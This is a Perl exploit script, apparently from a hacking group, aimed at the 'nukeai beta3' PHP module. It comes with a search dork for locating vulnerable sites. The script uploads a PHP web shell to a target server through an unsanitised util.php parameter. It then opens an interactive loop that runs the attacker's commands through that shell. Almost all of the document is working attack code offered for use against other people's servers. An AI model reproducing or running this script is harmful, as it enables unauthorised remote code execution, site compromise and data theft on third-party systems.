#!/usr/bin/perl # +------------------------------------------------------------------------------------------- # + nukeai beta3 (util.php) Remote Code Execution Vulnerability # +------------------------------------------------------------------------------------------- # + Affected Software .: nukeai beta3 # + Download ..........: http://mesh.dl.sourceforge.net/sourceforge/nukeai/nukeai_beta3.zip # + Dork ..............: "nukeai beta3" # + Class .............: Remote Code Execution # + Risk ..............: High (Remote Code Execution) # + Found By ..........: DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon # + Exploit:http://[target]/[path]/modules/NukeAI/util.php?AIbasedir=http:// # +------------------------------------------------------------------------------------------- # + Details: # + nukeai beta3 Download by default installation doesn't prevent any of the files in the # + modules/NukeAI directory from being accessed by a client. The modules/NukeAI # + file takes input passed to the script by util.php and writes it to $_POST["filename"].0 # + unsanatized in the modules/NukeAI descriptions directory. # + # + Vulnerable Code: # +require_once $AIbasedir."/NukeAI/util.php"; # +------------------------------------------------------------------------------------------- # Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell] use Getopt::Long; use URI::Escape; use IO::Socket; $code = "<?php passthru(\$_GET[cmd]); ?>"; main(); sub usage { print "DeltahackingSecurityTEAM\n"; print "www.deltahacking.net\n"; print "Dr.Trojan,HIV++,D_7j,Lord,VPc,IMpostor,Dr.Pantagon\n"; print " http://advistory.deltahacking.net((we Bug))\n"; print "\nukeai beta3 Remote Code Execution Exploit\n"; print "-h, --host\ttarget host\t(example.com)\n"; print "-f, --file\tshell file\t(shell.php)\n"; print "-d, --dir\tinstall dir\t(/NukeAI)\n"; print "============================================================================farzad.sharifi\r\n"; exit; } sub main { GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir); usage() unless $host; $dir = "/NukeAI" unless $dir; $file = "shell.php" unless $file; uri_escape($cmd); $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80") or die "\nconnect() failed.\n"; print "\nconnected to ".$host.", sending data.\n"; $sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit"; $sendlen = length($sendurl); print $sock "POST ".$dir."NukeAI/util.php?AIbasedir= HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Connection: close\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$sendlen."\n\n"; print $sock $sendurl; print "attempted to create php shell, server response:\n\n"; while($recvd = <$sock>) { print " ".$recvd.""; } while($cmd !~ "~quit") { print "\n\n-> "; $cmd = <STDIN>; if ($cmd !~ "~quit") { $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80") or die "connect() failed.\n"; $sendurl = uri_escape($cmd); print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Accept: */*\n"; print $sock "Connection: close\n\n"; print "\n"; while($recvd = <$sock>) { print $recvd; } } } exit; }
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